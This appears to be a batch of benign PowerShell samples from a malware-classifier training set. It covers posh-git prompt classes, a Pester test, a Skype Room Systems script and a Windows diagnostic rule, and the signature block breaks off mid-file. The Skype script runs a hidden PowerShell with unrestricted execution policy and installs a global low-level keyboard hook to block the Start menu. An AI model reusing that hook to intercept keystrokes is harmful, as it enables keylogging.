combined_dataset/train/non-malicious/7.ps1
7.ps1
enum BranchBehindAndAheadDisplayOptions { Full; Compact; Minimal } enum UntrackedFilesMode { Default; No; Normal; All } class PoshGitCellColor { [psobject]$BackgroundColor [psobject]$ForegroundColor PoshGitCellColor() { $this.ForegroundColor = $null $this.BackgroundColor = $null } PoshGitCellColor([psobject]$ForegroundColor) { $this.ForegroundColor = $ForegroundColor $this.BackgroundColor = $null } PoshGitCellColor([psobject]$ForegroundColor, [psobject]$BackgroundColor) { $this.ForegroundColor = $ForegroundColor $this.BackgroundColor = $BackgroundColor } hidden [string] ToString($color) { $ansiTerm = "$([char]27)[0m" $colorSwatch = " " $str = "" if (!$color) { $str = "<default>" } elseif (Test-VirtualTerminalSequece $color -Force) { if ($global:GitPromptSettings.AnsiConsole) { if ($color -eq $this.ForegroundColor) { $colorSwatch = " } $str = "${color}$colorSwatch${ansiTerm} " } $str = "`"$(EscapeAnsiString $color)`"" } else { if ($global:GitPromptSettings.AnsiConsole) { $bg = Get-BackgroundVirtualTerminalSequence $color $str = "${bg}${colorSwatch}${ansiTerm} " } if ($color -is [int]) { $str += "0x{0:X6}" -f $color } else { $str += $color.ToString() } } return $str } [string] ToEscapedString() { if (!$global:GitPromptSettings.AnsiConsole) { return "" } $str = "" if ($this.ForegroundColor) { if (Test-VirtualTerminalSequece $this.ForegroundColor) { $str += EscapeAnsiString $this.ForegroundColor } else { $seq = Get-ForegroundVirtualTerminalSequence $this.ForegroundColor $str += EscapeAnsiString $seq } } if ($this.BackgroundColor) { if (Test-VirtualTerminalSequece $this.BackgroundColor) { $str += EscapeAnsiString $this.BackgroundColor } else { $seq = Get-BackgroundVirtualTerminalSequence $this.BackgroundColor $str += EscapeAnsiString $seq } } return $str } [string] ToString() { $str = "ForegroundColor: " $str += $this.ToString($this.ForegroundColor) + ", " $str += "BackgroundColor: " $str += $this.ToString($this.BackgroundColor) return $str } } class PoshGitTextSpan { [string]$Text [psobject]$BackgroundColor [psobject]$ForegroundColor PoshGitTextSpan() { $this.Text = "" $this.ForegroundColor = $null $this.BackgroundColor = $null } PoshGitTextSpan([string]$Text) { $this.Text = $Text $this.ForegroundColor = $null $this.BackgroundColor = $null } PoshGitTextSpan([string]$Text, [psobject]$ForegroundColor) { $this.Text = $Text $this.ForegroundColor = $ForegroundColor $this.BackgroundColor = $null } PoshGitTextSpan([string]$Text, [psobject]$ForegroundColor, [psobject]$BackgroundColor) { $this.Text = $Text $this.ForegroundColor = $ForegroundColor $this.BackgroundColor = $BackgroundColor } PoshGitTextSpan([PoshGitTextSpan]$PoshGitTextSpan) { $this.Text = $PoshGitTextSpan.Text $this.ForegroundColor = $PoshGitTextSpan.ForegroundColor $this.BackgroundColor = $PoshGitTextSpan.BackgroundColor } PoshGitTextSpan([PoshGitCellColor]$PoshGitCellColor) { $this.Text = '' $this.ForegroundColor = $PoshGitCellColor.ForegroundColor $this.BackgroundColor = $PoshGitCellColor.BackgroundColor } [PoshGitTextSpan] Expand() { if (!$this.Text) { return $this } $execContext = Get-Variable ExecutionContext -ValueOnly $expandedText = $execContext.SessionState.InvokeCommand.ExpandString($this.Text) $newTextSpan = [PoshGitTextSpan]::new($expandedText, $this.ForegroundColor, $this.BackgroundColor) return $newTextSpan } [string] ToAnsiString() { $reset = [System.Collections.Generic.List[string]]::new() $e = [char]27 + "[" $fg = $this.ForegroundColor if (($null -ne $fg) -and !(Test-VirtualTerminalSequece $fg)) { $fg = Get-ForegroundVirtualTerminalSequence $fg $reset.Add('39') } $bg = $this.BackgroundColor if (($null -ne $bg) -and !(Test-VirtualTerminalSequece $bg)) { $bg = Get-BackgroundVirtualTerminalSequence $bg $reset.Add('49') } $txt = $this.Text $str = "${fg}${bg}${txt}" if (Test-VirtualTerminalSequece $txt -Force) { $reset.Clear() $reset.Add('0') } if ($reset.Count -gt 0) { $str += "${e}$($reset -join ';')m" } return $str } [string] ToEscapedString() { $str = EscapeAnsiString $this.ToAnsiString() return $str } [string] ToString() { $sep = " " if ($this.Text.Length -lt 2) { $sep = " " * (3 - $this.Text.Length) } if ($global:GitPromptSettings.AnsiConsole) { $txt = $this.ToAnsiString() if (Test-VirtualTerminalSequece $txt) { $escAnsi = "ANSI: `"$(EscapeAnsiString $txt)`"" $str = "Text: `"$txt`",${sep}${escAnsi}" } else { $str = "Text: `"$txt`"" } } else { $txt = $this.Text if (Test-VirtualTerminalSequece $txt -Force) { $txt = EscapeAnsiString $txt } $color = [PoshGitCellColor]::new($this.ForegroundColor, $this.BackgroundColor) $str = "Text: `"$txt`",${sep}$($color.ToString())" } return $str } } class PoshGitPromptSettings { [bool]$AnsiConsole = $Host.UI.SupportsVirtualTerminal -or ($Env:ConEmuANSI -eq "ON") [bool]$SetEnvColumns = $true [PoshGitCellColor]$DefaultColor = [PoshGitCellColor]::new() [PoshGitCellColor]$BranchColor = [PoshGitCellColor]::new([ConsoleColor]::Cyan) [PoshGitCellColor]$IndexColor = [PoshGitCellColor]::new([ConsoleColor]::DarkGreen) [PoshGitCellColor]$WorkingColor = [PoshGitCellColor]::new([ConsoleColor]::DarkRed) [PoshGitCellColor]$StashColor = [PoshGitCellColor]::new([ConsoleColor]::Red) [PoshGitCellColor]$ErrorColor = [PoshGitCellColor]::new([ConsoleColor]::Red) [PoshGitTextSpan]$PathStatusSeparator = ' ' [PoshGitTextSpan]$BeforeStatus = [PoshGitTextSpan]::new('[', [ConsoleColor]::Yellow) [PoshGitTextSpan]$DelimStatus = [PoshGitTextSpan]::new(' |', [ConsoleColor]::Yellow) [PoshGitTextSpan]$AfterStatus = [PoshGitTextSpan]::new(']', [ConsoleColor]::Yellow) [PoshGitTextSpan]$BeforeIndex = [PoshGitTextSpan]::new('', [ConsoleColor]::DarkGreen) [PoshGitTextSpan]$BeforeStash = [PoshGitTextSpan]::new(' (', [ConsoleColor]::Red) [PoshGitTextSpan]$AfterStash = [PoshGitTextSpan]::new(')', [ConsoleColor]::Red) [PoshGitTextSpan]$LocalDefaultStatusSymbol = [PoshGitTextSpan]::new('', [ConsoleColor]::DarkGreen) [PoshGitTextSpan]$LocalWorkingStatusSymbol = [PoshGitTextSpan]::new('!', [ConsoleColor]::DarkRed) [PoshGitTextSpan]$LocalStagedStatusSymbol = [PoshGitTextSpan]::new('~', [ConsoleColor]::Cyan) [PoshGitTextSpan]$BranchGoneStatusSymbol = [PoshGitTextSpan]::new([char]0x00D7, [ConsoleColor]::DarkCyan) [PoshGitTextSpan]$BranchIdenticalStatusSymbol = [PoshGitTextSpan]::new([char]0x2261, [ConsoleColor]::Cyan) [PoshGitTextSpan]$BranchAheadStatusSymbol = [PoshGitTextSpan]::new([char]0x2191, [ConsoleColor]::Green) [PoshGitTextSpan]$BranchBehindStatusSymbol = [PoshGitTextSpan]::new([char]0x2193, [ConsoleColor]::Red) [PoshGitTextSpan]$BranchBehindAndAheadStatusSymbol = [PoshGitTextSpan]::new([char]0x2195, [ConsoleColor]::Yellow) [BranchBehindAndAheadDisplayOptions]$BranchBehindAndAheadDisplay = [BranchBehindAndAheadDisplayOptions]::Full [string]$FileAddedText = '+' [string]$FileModifiedText = '~' [string]$FileRemovedText = '-' [string]$FileConflictedText = '!' [string]$BranchUntrackedText = '' [bool]$EnableStashStatus = $false [bool]$ShowStatusWhenZero = $true [bool]$AutoRefreshIndex = $true [UntrackedFilesMode]$UntrackedFilesMode = [UntrackedFilesMode]::Default [bool]$EnablePromptStatus = !$global:GitMissing [bool]$EnableFileStatus = $true [Nullable[bool]]$EnableFileStatusFromCache = $null [string[]]$RepositoriesInWhichToDisableFileStatus = @() [string]$DescribeStyle = '' [psobject]$WindowTitle = {param($GitStatus, [bool]$IsAdmin) "$(if ($IsAdmin) {'Admin: '})$(if ($GitStatus) {"$($GitStatus.RepoName) [$($GitStatus.Branch)]"} else {Get-PromptPath}) ~ PowerShell $($PSVersionTable.PSVersion.Major).$($PSVersionTable.PSVersion.Minor) $(if ([IntPtr]::Size -eq 4) {'32-bit '})($PID)"} [PoshGitTextSpan]$DefaultPromptPrefix = '$(Get-PromptConnectionInfo -Format "[{1}@{0}]: ")' [PoshGitTextSpan]$DefaultPromptPath = '$(Get-PromptPath)' [PoshGitTextSpan]$DefaultPromptBeforeSuffix = '' [PoshGitTextSpan]$DefaultPromptDebug = [PoshGitTextSpan]::new(' [DBG]:', [ConsoleColor]::Magenta) [PoshGitTextSpan]$DefaultPromptSuffix = '$(">" * ($nestedPromptLevel + 1)) ' [bool]$DefaultPromptAbbreviateHomeDirectory = $true [bool]$DefaultPromptWriteStatusFirst = $false [bool]$DefaultPromptEnableTiming = $false [PoshGitTextSpan]$DefaultPromptTimingFormat = ' {0}ms' [int]$BranchNameLimit = 0 [string]$TruncatedBranchSuffix = '...' [bool]$Debug = $false } class PoshGitPromptValues { [int]$LastExitCode [bool]$DollarQuestion [bool]$IsAdmin [string]$LastPrompt }
combined_dataset/train/non-malicious/1922.ps1
1922.ps1
Describe "Get-TraceSource" -Tags "Feature" { It "Should output data sorted by name" { $expected = (Get-TraceSource | Sort-Object Name) Get-TraceSource | Should -Be $expected } }
combined_dataset/train/non-malicious/sample_34_33.ps1
sample_34_33.ps1
using module ..\..\Config.psm1 Param( [Parameter(Mandatory=$False)] [switch]$Launch=$false, [Parameter(Mandatory=$False)] [switch]$TestStatus=$false ) Import-Module (Join-Path $PSScriptRoot "..\..\Events.psm1") if ($TestStatus) { return [string]([ApplyResult]::Success) } if (!$Launch) { Write-EventLog @AttemptBlockStartMenu Start-Process powershell.exe -NoNewWindow -ArgumentList ("-executionpolicy unrestricted", $PSCommandPath.Replace(" ", "`` "), "-Launch") -RedirectStandardError "NUL" -RedirectStandardInput "NUL" -RedirectStandardOutput "NUL" Write-EventLog @LanunchBlockStartMenu return } Add-Type -TypeDefinition @" using System; using System.Collections.Generic; using System.Diagnostics; using System.Runtime.InteropServices; using System.Windows.Forms; namespace SkypeRoomSystems { public static class BlockStartMenu { [STAThread] public static void Main() { try { hook = DLLImports.SetWindowsHookEx(DLLImports.WH_KEYBOARD_LL, lowLevelKeyboardProc, GetCurrentModuleHandle(), 0); Application.Run(); } catch (Exception e) { EventLogger.LogException(e); } } private static IntPtr GetCurrentModuleHandle() { return DLLImports.GetModuleHandle(Process.GetCurrentProcess().MainModule.ModuleName); } private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam) { if (nCode == 0) { var keyPressed = (Keys)Marshal.ReadInt32(lParam); if (wParam == DLLImports.WM_SYSKEYDOWN || wParam == DLLImports.WM_KEYDOWN) { keysPressed.Add(keyPressed); } else if (wParam == DLLImports.WM_SYSKEYUP || wParam == DLLImports.WM_KEYUP) { if ((keysPressed.Count == 1 && (keysPressed.Contains(Keys.LWin) || keysPressed.Contains(Keys.RWin))) || // Only LWin or RWin pressed and released (keysPressed.Count == 2 && keysPressed.Contains(Keys.LWin) && keysPressed.Contains(Keys.RWin))) // Both LWin and RWin pressed and either released { DLLImports.keybd_event((byte)Keys.Escape, 0, DLLImports.KEYEVENTF_KEYDOWN, 0); DLLImports.keybd_event((byte)keyPressed, 0, DLLImports.KEYEVENTF_KEYUP, 0); DLLImports.keybd_event((byte)Keys.Escape, 0, DLLImports.KEYEVENTF_KEYUP, 0); // Block start menu return (IntPtr)1; } keysPressed.Remove(keyPressed); } } // no-op, call next hook return DLLImports.CallNextHookEx(hook, nCode, wParam, lParam); } private static IntPtr hook = IntPtr.Zero; private static HashSet<Keys> keysPressed = new HashSet<Keys>(); private static DLLImports.LowLevelKeyboardProc lowLevelKeyboardProc = HookCallback; } static class EventLogger { public static void LogException(Exception e) { WriteEntry(CRASH_EVENT, EventLogEntryType.Error, string.Format(CRASH_EVENT_FORMAT_STRING, e.HResult.ToString("X8"), e.Message)); } private static void WriteEntry(int eventId, EventLogEntryType entryType, string message) { try { IntPtr hEventLog = DLLImports.RegisterEventSource(null, SOURCE); DLLImports.ReportEvent(hEventLog, (ushort)entryType, 0, eventId, IntPtr.Zero, 1, 0, new string[] { message }, null); DLLImports.DeregisterEventSource(hEventLog); } catch (Exception) { /*Do nothing*/ } } private const string SOURCE = "SkypeRoomSystem"; private const int CRASH_EVENT = 4901; private const string CRASH_EVENT_FORMAT_STRING = "BlockStartMenu Crashed : {0} : {1}"; } static class DLLImports { public const int WH_KEYBOARD_LL = 13; public const uint KEYEVENTF_KEYDOWN = 0x0000; public const uint KEYEVENTF_KEYUP = 0x0002; public readonly static IntPtr WM_KEYDOWN = new IntPtr(0x0100); public readonly static IntPtr WM_SYSKEYDOWN = new IntPtr(0x0104); public readonly static IntPtr WM_KEYUP = new IntPtr(0x0101); public readonly static IntPtr WM_SYSKEYUP = new IntPtr(0x0105); public delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam); [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] public static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId); [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] public static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam); [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] public static extern IntPtr GetModuleHandle(string lpModuleName); [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] public static extern void keybd_event(byte bVk, byte bScan, uint dwFlags, int dwExtraInfo); [DllImport("advapi32.dll")] public static extern IntPtr RegisterEventSource(string lpUNCServerName, string lpSourceName); [DllImport("advapi32.dll")] public static extern bool DeregisterEventSource(IntPtr hEventLog); [DllImport("advapi32.dll", EntryPoint = "ReportEventW", CharSet = CharSet.Unicode)] public static extern bool ReportEvent( IntPtr hEventLog, ushort wType, ushort wCategory, int dwEventID, IntPtr lpUserSid, ushort wNumStrings, uint dwDataSize, string[] lpStrings, byte[] lpRawData); } } "@ -ReferencedAssemblies System.Windows.Forms [SkypeRoomSystems.BlockStartMenu]::Main();
combined_dataset/train/non-malicious/sample_8_42.ps1
sample_8_42.ps1
#************************************************ # TS_AppCompatDisabledCheck.ps1 # Version 1.0.1 # Date: 6/8/2012 # Author: v-blchen # Description: [Idea ID 3317] [Windows] DisableEngine reg entry can cause app install or registration failure # Rule number: 3317 # Rule URL: http://sharepoint/sites/rules/Rule Submissions/Forms/DispForm.aspx?ID=3317 #************************************************ Import-LocalizedData -BindingVariable ScriptStrings Display-DefaultActivity -Rule -RuleNumber 3317 $RuleApplicable = $false $RootCauseDetected = $false $RootCauseName = "RC_AppCompatDisabledCheck" $PublicContent = "" $InternalContent = "https://vkbexternal.partners.extranet.microsoft.com/VKBWebService/ViewContent.aspx?scid=B;EN-US;2694134" $Verbosity = "Warning" $Visibility = "3" $SupportTopicsID = "8022" $Title = $ScriptStrings.ID_AppCompatDisabledCheck_ST $InformationCollected = new-object PSObject # *************************** # Data Gathering # *************************** # check whether is applies to current system Function AppliesToSystem { if ((($OSVersion.Major -eq 6) -and ($OSVersion.Minor -eq 0)) -or # Server 2008 / Vista (($OSVersion.Major -eq 6) -and ($OSVersion.Minor -eq 1)) -or # Win 7/R2 (($OSVersion.Major -eq 6) -and ($OSVersion.Minor -eq 2)) -or # Win8/Server 2012 ($OSVersion.Major -eq 10) ) # Win10 { return $true } else { return $false } } # check whether the state of ApplicationCompatibilityEngine is set to 1 Function CheckStateOfApplicationCompatibilityEngine { $AppCompatkey = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\AppCompat" if(Test-Path $AppCompatkey) { $DisableEngineValue = (Get-ItemProperty -Path $AppCompatkey).DisableEngine if($DisableEngineValue -eq 1) { return $true } } return $false } # ************** # Detection Logic # ************** #Check to see if rule is applicable to this computer if (AppliesToSystem) { $RuleApplicable = $true if ($true) { $RootCauseDetected = CheckStateOfApplicationCompatibilityEngine } } # ********************* # Root Cause processing # ********************* if ($RuleApplicable) { if ($RootCauseDetected) { # Red/ Yellow Light Update-DiagRootCause -id $RootCauseName -Detected $true Write-GenericMessage -RootCauseId $RootCauseName -PublicContentURL $PublicContent -InformationCollected $InformationCollected -Verbosity $Verbosity -Visibility $Visibility -SupportTopicsID $SupportTopicsID -InternalContentURL $InternalContent -SolutionTitle $Title } else { # Green Light Update-DiagRootCause -id $RootCauseName -Detected $false } } # SIG # Begin signature block # MIIoOQYJKoZIhvcNAQcCoIIoKjCCKCYCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCMDiDLk4CNsZFP # I/A5hx7k/a4nkHNH4s51XYFLN4iTb6CCDYUwggYDMIID66ADAgECAhMzAAAEA73V # lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV # LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY # oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi # kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/ # /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv # ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r # EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV # NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC # rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos # oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB # +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO # raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+ # sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W # +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s # IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu # iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA # BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIGqq # Tg4c3t9DtYK/iG1PA3tcbksy63gB8xcb+saN5MsBMEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAR/1zBxZChLfVgCnvVw78LTg8wmGkhQUoKJAo # Ne2TcqoGX0jjVGhrr936KK89jao0rE4jg7Z6LLUoPjcLx4mo4hnLDDyXt7UNQ5Ir # ABvYRvMvy1+XORGbH15n8gATah1NvkdH9clEB7ex9yNgZCwD4cB/qezrMTcE1vIV # 0n6XeYBI7NIJ2GdZot3fgEynR3dEJ4skf7pZKUUsn3BHDMn1qfGqef1mxJ9F7vSn # ZRFPmcI8f2pIT/Ete35FmzH5LXhuhJNkcWC6/WJmwF+SKNrYqnPbyVqHT9mhlzjS # rXjWxjmmNqjWC/i6wIAIfz2pRHXo0DcjorduNWzidgEZc4GaFaGCF5QwgheQBgor # BgEEAYI3AwMBMYIXgDCCF3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFSBgsqhkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCAT3MRI6s7pVjz+Zd58qSjyb1QUody4TgqF # 0Hldh5oS6AIGZxqGn7o8GBMyMDI0MTAyODExNDM0OC42MTNaMASAAgH0oIHRpIHO # MIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQL # ExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxk # IFRTUyBFU046ODkwMC0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1l # LVN0YW1wIFNlcnZpY2WgghHqMIIHIDCCBQigAwIBAgITMwAAAe3hX8vV96VdcwAB # AAAB7TANBgkqhkiG9w0BAQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx # MDAeFw0yMzEyMDYxODQ1NDFaFw0yNTAzMDUxODQ1NDFaMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046ODkwMC0w # NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Uw # ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCoMMJskrrqapycLxPC1H7z # D7g88NpbEaQ6SjcTIRbzCVyYQNsz8TaL1pqFTEAPL1X7ojL4/EaEW+UjNqZs/ayM # 